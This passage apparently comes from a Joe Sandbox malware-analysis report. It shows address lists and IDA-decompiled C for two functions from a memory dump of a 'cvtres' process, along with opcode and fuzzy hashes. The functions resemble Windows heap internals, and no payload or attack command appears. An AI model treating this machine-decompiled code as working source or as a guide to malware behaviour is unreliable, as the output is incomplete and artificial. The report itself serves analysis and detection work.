                                                                        0x055bdc91
                                                                        0x055bdc93
                                                                        0x055bdcce
                                                                        0x055bdcce
                                                                        0x055bdc95
                                                                        0x055bdc9c
                                                                        0x055bdc6e
                                                                        0x055bdc72
                                                                        0x055bdc75
                                                                        0x055bdc77
                                                                        0x055bdc79
                                                                        0x0560b551
                                                                        0x0560b551
                                                                        0x00000000
                                                                        0x055bdc7f
                                                                        0x055bdc7f
                                                                        0x055bdc81
                                                                        0x00000000
                                                                        0x055bdc83
                                                                        0x055bdc86
                                                                        0x055bdc88
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055bdc88
                                                                        0x055bdc81
                                                                        0x055bdc79
                                                                        0x055bdc6c
                                                                        0x055bdc55
                                                                        0x055bdc47
                                                                        0x055bdc43
                                                                        0x00000000
                                                                        0x055bdc36
                                                                        0x055bdc23
                                                                        0x00000000
                                                                        0x055bdbff
                                                                        0x055bdbf1
                                                                        0x055bdbdf
                                                                        0x055bdb8f
                                                                        0x055bdb92
                                                                        0x055bdb95
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055bdb95
                                                                        0x055bdb8d
                                                                        0x055bdb85
                                                                        0x055bdb74
                                                                        0x055bdc9f
                                                                        0x055bdca2
                                                                        0x055bdcb0
                                                                        0x055bdcb0
                                                                        0x055bdad1
                                                                        0x0560b4e5
                                                                        0x0560b4c8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055bd831
                                                                        0x00000000
                                                                        0x055bd800
                                                                        0x0560b47f
                                                                        0x0560b485
                                                                        0x00000000
                                                                        0x0560b485
                                                                        0x055bd665
                                                                        0x055bd652
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c984b388adf5b441becbb1f6bb4c773e4b59ef740b6d59b34079d7eecb54b115
                                                                        • Instruction ID: 4e9a676eaf10a6ae55460fda65c64621550d12daf238fd2498ded50c9a489228
                                                                        • Opcode Fuzzy Hash: c984b388adf5b441becbb1f6bb4c773e4b59ef740b6d59b34079d7eecb54b115
                                                                        • Instruction Fuzzy Hash: 15E1A330B043598FEB38CF14C988BFEB7B6BF85314F1441A9E80A57690DBB4A941CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055CB236 Relevance: .3, Instructions: 305COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E055CB236(signed int __ecx, intOrPtr __edx) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				unsigned int _t94;
				signed int _t96;
				intOrPtr _t97;
				unsigned int _t101;
				char _t103;
				signed int _t114;
				signed int _t115;
				signed char* _t118;
				intOrPtr _t119;
				signed int _t120;
				signed char* _t123;
				signed int _t129;
				char* _t132;
				unsigned int _t147;
				signed int _t157;
				unsigned int _t158;
				signed int _t159;
				signed int _t165;
				signed int _t168;
				signed char _t175;
				signed char _t185;
				unsigned int _t197;
				unsigned int _t206;
				unsigned int* _t214;
				signed int _t218;

				_t156 = __edx;
				_v24 = __edx;
				_t218 = __ecx;
				_t3 = _t156 + 0xfff; // 0xfff
				_t210 = 0;
				_v16 = _t3 & 0xfffff000;
				if(E055CB477(__ecx,  &_v16) == 0) {
					__eflags =  *(__ecx + 0x40) & 0x00000002;
					if(( *(__ecx + 0x40) & 0x00000002) == 0) {
						L32:
						__eflags =  *(_t218 + 0x40) & 0x00000080;
						if(( *(_t218 + 0x40) & 0x00000080) != 0) {
							_t210 = E0564CB4F(_t218);
							__eflags = _t210;
							if(_t210 == 0) {
								goto L33;
							}
							__eflags = ( *_t210 & 0x0000ffff) - _t156;
							if(( *_t210 & 0x0000ffff) < _t156) {
								goto L33;
							}
							_t157 = _t210;
							goto L3;
						}
						L33:
						_t157 = 0;
						__eflags = _t210;
						if(_t210 != 0) {
							__eflags =  *(_t218 + 0x4c);
							if( *(_t218 + 0x4c) != 0) {
								 *(_t210 + 3) =  *(_t210 + 2) ^  *(_t210 + 1) ^  *_t210;
								 *_t210 =  *_t210 ^  *(_t218 + 0x50);
							}
						}
						goto L3;
					}
					_v12 = _v12 & 0;
					_t158 = __edx + 0x2000;
					_t94 =  *((intOrPtr*)(__ecx + 0x64));
					__eflags = _t158 - _t94;
					if(_t158 > _t94) {
						_t94 = _t158;
					}
					__eflags =  *((char*)(_t218 + 0xda)) - 2;
					if( *((char*)(_t218 + 0xda)) != 2) {
						_t165 = 0;
					} else {
						_t165 =  *(_t218 + 0xd4);
					}
					__eflags = _t165;
					if(_t165 == 0) {
						__eflags = _t94 - 0x3f4000;
						if(_t94 >= 0x3f4000) {
							 *(_t218 + 0x48) =  *(_t218 + 0x48) | 0x20000000;
						}
					}
					_t96 = _t94 + 0x0000ffff & 0xffff0000;
					_v8 = _t96;
					__eflags = _t96 - 0xfd0000;
					if(_t96 >= 0xfd0000) {
						_v8 = 0xfd0000;
					}
					_t97 = E055D0678(_t218, 1);
					_push(_t97);
					_push(0x2000);
					_v28 = _t97;
					_push( &_v8);
					_push(0);
					_push( &_v12);
					_push(0xffffffff);
					_t168 = E055E9660();
					__eflags = _t168;
					if(_t168 < 0) {
						while(1) {
							_t101 = _v8;
							__eflags = _t101 - _t158;
							if(_t101 == _t158) {
								break;
							}
							_t147 = _t101 >> 1;
							_v8 = _t147;
							__eflags = _t147 - _t158;
							if(_t147 < _t158) {
								_v8 = _t158;
							}
							_push(_v28);
							_push(0x2000);
							_push( &_v8);
							_push(0);
							_push( &_v12);
							_push(0xffffffff);
							_t168 = E055E9660();
							__eflags = _t168;
							if(_t168 < 0) {
								continue;
							} else {
								_t101 = _v8;
								break;
							}
						}
						__eflags = _t168;
						if(_t168 >= 0) {
							goto L12;
						}
						 *((intOrPtr*)(_t218 + 0x214)) =  *((intOrPtr*)(_t218 + 0x214)) + 1;
						goto L60;
					} else {
						_t101 = _v8;
						L12:
						 *((intOrPtr*)(_t218 + 0x64)) =  *((intOrPtr*)(_t218 + 0x64)) + _t101;
						_t103 = _v24 + 0x1000;
						__eflags = _t103 -  *((intOrPtr*)(_t218 + 0x68));
						if(_t103 <=  *((intOrPtr*)(_t218 + 0x68))) {
							_t103 =  *((intOrPtr*)(_t218 + 0x68));
						}
						_push(_v28);
						_v20 = _t103;
						_push(0x1000);
						_push( &_v20);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						_t159 = E055E9660();
						__eflags = _t159;
						if(_t159 < 0) {
							L59:
							E055D174B( &_v12,  &_v8, 0x8000);
							L60:
							_t156 = _v24;
							goto L32;
						} else {
							_t114 = E055D138B(_t218, _v12, 0x40, _t168, 2, _v12, _v20 + _v12, _v8 + 0xfffff000 + _t192);
							__eflags = _t114;
							if(_t114 == 0) {
								_t159 = 0xc0000017;
							}
							__eflags = _t159;
							if(_t159 < 0) {
								goto L59;
							} else {
								_t115 = E055C7D50();
								_t212 = 0x7ffe0380;
								__eflags = _t115;
								if(_t115 != 0) {
									_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t118 = 0x7ffe0380;
								}
								__eflags =  *_t118;
								if( *_t118 != 0) {
									_t119 =  *[fs:0x30];
									__eflags =  *(_t119 + 0x240) & 0x00000001;
									if(( *(_t119 + 0x240) & 0x00000001) != 0) {
										E0566138A(0x226, _t218, _v12, _v20, 4);
										__eflags = E055C7D50();
										if(__eflags != 0) {
											_t212 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E05661582(0x226, _t218,  *(_v12 + 0x24), __eflags, _v20,  *(_t218 + 0x74) << 3,  *_t212 & 0x000000ff);
									}
								}
								_t120 = E055C7D50();
								_t213 = 0x7ffe038a;
								__eflags = _t120;
								if(_t120 != 0) {
									_t123 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t123 = 0x7ffe038a;
								}
								__eflags =  *_t123;
								if( *_t123 != 0) {
									__eflags = E055C7D50();
									if(__eflags != 0) {
										_t213 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									}
									E05661582(0x230, _t218,  *(_v12 + 0x24), __eflags, _v20,  *(_t218 + 0x74) << 3,  *_t213 & 0x000000ff);
								}
								_t129 = E055C7D50();
								__eflags = _t129;
								if(_t129 != 0) {
									_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								} else {
									_t132 = 0x7ffe0388;
								}
								__eflags =  *_t132;
								if( *_t132 != 0) {
									E0565FEC0(0x230, _t218, _v12, _v8);
								}
								__eflags =  *(_t218 + 0x4c);
								_t214 =  *(_v12 + 0x24);
								if( *(_t218 + 0x4c) != 0) {
									_t197 =  *(_t218 + 0x50) ^  *_t214;
									 *_t214 = _t197;
									_t175 = _t197 >> 0x00000010 ^ _t197 >> 0x00000008 ^ _t197;
									__eflags = _t197 >> 0x18 - _t175;
									if(__eflags != 0) {
										_push(_t175);
										E0565FA2B(0x230, _t218, _t214, _t214, _t218, __eflags);
									}
								}
								_t157 =  *(_v12 + 0x24);
								goto L3;
							}
						}
					}
				} else {
					_v16 = _v16 >> 3;
					_t157 = E055C99BF(__ecx, _t87,  &_v16, 0);
					E055CA830(__ecx, _t157, _v16);
					if( *(_t218 + 0x4c) != 0) {
						_t206 =  *(_t218 + 0x50) ^  *_t157;
						 *_t157 = _t206;
						_t185 = _t206 >> 0x00000010 ^ _t206 >> 0x00000008 ^ _t206;
						if(_t206 >> 0x18 != _t185) {
							_push(_t185);
							E0565FA2B(_t157, _t218, _t157, 0, _t218, __eflags);
						}
					}
					L3:
					return _t157;
				}
			}






































                                                                        0x055cb23f
                                                                        0x055cb246
                                                                        0x055cb249
                                                                        0x055cb24b
                                                                        0x055cb251
                                                                        0x055cb258
                                                                        0x055cb262
                                                                        0x055cb2b2
                                                                        0x055cb2b6
                                                                        0x055cb456
                                                                        0x055cb456
                                                                        0x055cb45a
                                                                        0x05612912
                                                                        0x05612914
                                                                        0x05612916
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0561291f
                                                                        0x05612921
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05612927
                                                                        0x00000000
                                                                        0x05612927
                                                                        0x055cb460
                                                                        0x055cb460
                                                                        0x055cb462
                                                                        0x055cb464
                                                                        0x0561292e
                                                                        0x05612931
                                                                        0x0561293f
                                                                        0x05612945
                                                                        0x05612945
                                                                        0x05612931
                                                                        0x00000000
                                                                        0x055cb464
                                                                        0x055cb2bc
                                                                        0x055cb2bf
                                                                        0x055cb2c5
                                                                        0x055cb2c8
                                                                        0x055cb2ca
                                                                        0x056127af
                                                                        0x056127af
                                                                        0x055cb2d0
                                                                        0x055cb2d7
                                                                        0x055cb437
                                                                        0x055cb2dd
                                                                        0x055cb2dd
                                                                        0x055cb2dd
                                                                        0x055cb2e3
                                                                        0x055cb2e5
                                                                        0x055cb43e
                                                                        0x055cb443
                                                                        0x056127b6
                                                                        0x056127b6
                                                                        0x055cb443
                                                                        0x055cb2f5
                                                                        0x055cb2fa
                                                                        0x055cb2fd
                                                                        0x055cb2ff
                                                                        0x055cb46f
                                                                        0x055cb46f
                                                                        0x055cb30a
                                                                        0x055cb30f
                                                                        0x055cb310
                                                                        0x055cb315
                                                                        0x055cb31b
                                                                        0x055cb31c
                                                                        0x055cb321
                                                                        0x055cb322
                                                                        0x055cb329
                                                                        0x055cb32b
                                                                        0x055cb32d
                                                                        0x056127c2
                                                                        0x056127c2
                                                                        0x056127c5
                                                                        0x056127c7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x056127c9
                                                                        0x056127cb
                                                                        0x056127ce
                                                                        0x056127d0
                                                                        0x056127d2
                                                                        0x056127d2
                                                                        0x056127d5
                                                                        0x056127db
                                                                        0x056127e0
                                                                        0x056127e1
                                                                        0x056127e6
                                                                        0x056127e7
                                                                        0x056127ee
                                                                        0x056127f0
                                                                        0x056127f2
                                                                        0x00000000
                                                                        0x056127f4
                                                                        0x056127f4
                                                                        0x00000000
                                                                        0x056127f4
                                                                        0x056127f2
                                                                        0x056127f7
                                                                        0x056127f9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x056127ff
                                                                        0x00000000
                                                                        0x055cb333
                                                                        0x055cb333
                                                                        0x055cb336
                                                                        0x055cb336
                                                                        0x055cb33c
                                                                        0x055cb341
                                                                        0x055cb344
                                                                        0x055cb44e
                                                                        0x055cb44e
                                                                        0x055cb34a
                                                                        0x055cb34d
                                                                        0x055cb353
                                                                        0x055cb358
                                                                        0x055cb359
                                                                        0x055cb35e
                                                                        0x055cb35f
                                                                        0x055cb366
                                                                        0x055cb368
                                                                        0x055cb36a
                                                                        0x056128f2
                                                                        0x056128fe
                                                                        0x05612903
                                                                        0x05612903
                                                                        0x00000000
                                                                        0x055cb370
                                                                        0x055cb38c
                                                                        0x055cb391
                                                                        0x055cb393
                                                                        0x0561280a
                                                                        0x0561280a
                                                                        0x055cb399
                                                                        0x055cb39b
                                                                        0x00000000
                                                                        0x055cb3a1
                                                                        0x055cb3a1
                                                                        0x055cb3a6
                                                                        0x055cb3b0
                                                                        0x055cb3b2
                                                                        0x0561281d
                                                                        0x055cb3b8
                                                                        0x055cb3b8
                                                                        0x055cb3b8
                                                                        0x055cb3ba
                                                                        0x055cb3bd
                                                                        0x05612824
                                                                        0x0561282a
                                                                        0x05612831
                                                                        0x05612841
                                                                        0x0561284b
                                                                        0x0561284d
                                                                        0x05612858
                                                                        0x05612858
                                                                        0x05612858
                                                                        0x05612870
                                                                        0x05612870
                                                                        0x05612831
                                                                        0x055cb3c3
                                                                        0x055cb3c8
                                                                        0x055cb3d2
                                                                        0x055cb3d4
                                                                        0x05612883
                                                                        0x055cb3da
                                                                        0x055cb3da
                                                                        0x055cb3da
                                                                        0x055cb3dc
                                                                        0x055cb3df
                                                                        0x0561288f
                                                                        0x05612891
                                                                        0x0561289c
                                                                        0x0561289c
                                                                        0x0561289c
                                                                        0x056128b4
                                                                        0x056128b4
                                                                        0x055cb3e5
                                                                        0x055cb3ea
                                                                        0x055cb3ec
                                                                        0x056128c7
                                                                        0x055cb3f2
                                                                        0x055cb3f2
                                                                        0x055cb3f2
                                                                        0x055cb3f7
                                                                        0x055cb3fa
                                                                        0x056128d9
                                                                        0x056128d9
                                                                        0x055cb400
                                                                        0x055cb407
                                                                        0x055cb40a
                                                                        0x055cb40f
                                                                        0x055cb413
                                                                        0x055cb41f
                                                                        0x055cb424
                                                                        0x055cb426
                                                                        0x056128e3
                                                                        0x056128e8
                                                                        0x056128e8
                                                                        0x055cb426
                                                                        0x055cb42f
                                                                        0x00000000
                                                                        0x055cb42f
                                                                        0x055cb39b
                                                                        0x055cb36a
                                                                        0x055cb264
                                                                        0x055cb264
                                                                        0x055cb279
                                                                        0x055cb27f
                                                                        0x055cb287
                                                                        0x055cb28c
                                                                        0x055cb290
                                                                        0x055cb29c
                                                                        0x055cb2a3
                                                                        0x056127a0
                                                                        0x056127a5
                                                                        0x056127a5
                                                                        0x055cb2a3
                                                                        0x055cb2a9
                                                                        0x055cb2b1
                                                                        0x055cb2b1

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
                                                                        • Instruction ID: a403331f63cfba69b2ac3aa160dc9e98231cad8dd494d2c223b1c4896b820703
                                                                        • Opcode Fuzzy Hash: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
                                                                        • Instruction Fuzzy Hash: E4B1EE75B046069FDB25CBEAC895B7EBBB6BF88310F5405ADE942D7381DB309900CB94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055B849B Relevance: .3, Instructions: 290COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 92%
                                                                        			E055B849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x567f9c0);
				E055FD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x5697b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E055BCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E055C2280( *[fs:0x30], 0x5698550);
						_t139 =  *0x5697b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E055DF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E055BFFB0(_t193, _t235, 0x5698550);
								L5:
								return E055FD130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E055A1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x5697b9c; // 0x0
							_t235 = L055C4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x5697b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E055DA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E055BFFB0(_t193, _t235, 0x5698550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L055C77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L055C77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x5697b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x5697b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E055E37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x5697b9c; // 0x0
									_t214 = L055C4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E055E37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x5697b10 =  *0x5697b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x5697b04 =  *0x5697b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L055C77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L055C77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x5697b08 =  *0x5697b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E055E57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E055EF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L055C77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E055DA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L055C77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E055E96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                                        0x055b849b
                                                                        0x055b849b
                                                                        0x055b849b
                                                                        0x055b849b
                                                                        0x055b849d
                                                                        0x055b84a2
                                                                        0x055b84a7
                                                                        0x055b84b1
                                                                        0x055b84d8
                                                                        0x00000000
                                                                        0x055b84b3
                                                                        0x055b84c4
                                                                        0x055b84c9
                                                                        0x055b84cd
                                                                        0x055b84cf
                                                                        0x055b84cf
                                                                        0x055b84d6
                                                                        0x055b84e6
                                                                        0x055b84e9
                                                                        0x055b84ec
                                                                        0x055b84ef
                                                                        0x055b84f2
                                                                        0x055b84f4
                                                                        0x055b84fc
                                                                        0x055b8501
                                                                        0x055b8506
                                                                        0x055b8509
                                                                        0x055b86e0
                                                                        0x055b86e5
                                                                        0x055b86e8
                                                                        0x055b86ed
                                                                        0x055b86f0
                                                                        0x055b86f2
                                                                        0x05609afd
                                                                        0x05609b02
                                                                        0x055b84da
                                                                        0x055b84df
                                                                        0x055b84df
                                                                        0x055b86fa
                                                                        0x055b86fd
                                                                        0x055b86fe
                                                                        0x055b8701
                                                                        0x055b8706
                                                                        0x055b8709
                                                                        0x055b870b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055b8711
                                                                        0x055b8725
                                                                        0x055b8727
                                                                        0x055b872a
                                                                        0x055b872c
                                                                        0x05609af0
                                                                        0x05609af5
                                                                        0x055b8732
                                                                        0x055b8732
                                                                        0x055b8732
                                                                        0x055b8735
                                                                        0x055b8737
                                                                        0x055b8515
                                                                        0x055b8515
                                                                        0x055b8518
                                                                        0x055b851d
                                                                        0x055b8523
                                                                        0x055b8527
                                                                        0x055b852b
                                                                        0x055b8537
                                                                        0x055b8539
                                                                        0x055b853c
                                                                        0x055b853e
                                                                        0x055b868c
                                                                        0x055b8691
                                                                        0x055b8699
                                                                        0x055b869b
                                                                        0x055b8744
                                                                        0x055b8748
                                                                        0x055b86a1
                                                                        0x055b86a1
                                                                        0x055b86a1
                                                                        0x055b86a4
                                                                        0x055b86a8
                                                                        0x05609bdf
                                                                        0x05609bdf
                                                                        0x055b86ae
                                                                        0x055b86b0
                                                                        0x00000000
                                                                        0x055b86b6
                                                                        0x00000000
                                                                        0x05609be9
                                                                        0x055b86b0
                                                                        0x055b8544
                                                                        0x055b854a
                                                                        0x055b854d
                                                                        0x055b8551
                                                                        0x055b876e
                                                                        0x055b8778
                                                                        0x055b877b
                                                                        0x055b8780
                                                                        0x055b8557
                                                                        0x055b8557
                                                                        0x055b855d
                                                                        0x055b855d
                                                                        0x055b856b
                                                                        0x055b856e
                                                                        0x055b8570
                                                                        0x055b8573
                                                                        0x055b8576
                                                                        0x055b8576
                                                                        0x055b8579
                                                                        0x055b857b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055b8581
                                                                        0x055b85a0
                                                                        0x055b85a2
                                                                        0x055b85a5
                                                                        0x055b85a7
                                                                        0x05609b1b
                                                                        0x05609b1b
                                                                        0x055b862e
                                                                        0x055b862e
                                                                        0x055b8631
                                                                        0x055b8631
                                                                        0x055b8634
                                                                        0x055b8636
                                                                        0x055b8669
                                                                        0x055b8669
                                                                        0x055b866b
                                                                        0x05609bbf
                                                                        0x05609bc4
                                                                        0x05609bc8
                                                                        0x05609bce
                                                                        0x05609bce
                                                                        0x055b8671
                                                                        0x055b8671
                                                                        0x055b8674
                                                                        0x055b8676
                                                                        0x05609bae
                                                                        0x05609bae
                                                                        0x055b8676
                                                                        0x055b867c
                                                                        0x055b867e
                                                                        0x055b8688
                                                                        0x055b8688
                                                                        0x00000000
                                                                        0x055b867e
                                                                        0x055b8638
                                                                        0x055b8638
                                                                        0x055b863b
                                                                        0x055b863e
                                                                        0x055b863f
                                                                        0x055b8642
                                                                        0x055b8645
                                                                        0x055b8648
                                                                        0x055b864d
                                                                        0x05609b69
                                                                        0x05609b6e
                                                                        0x05609b7b
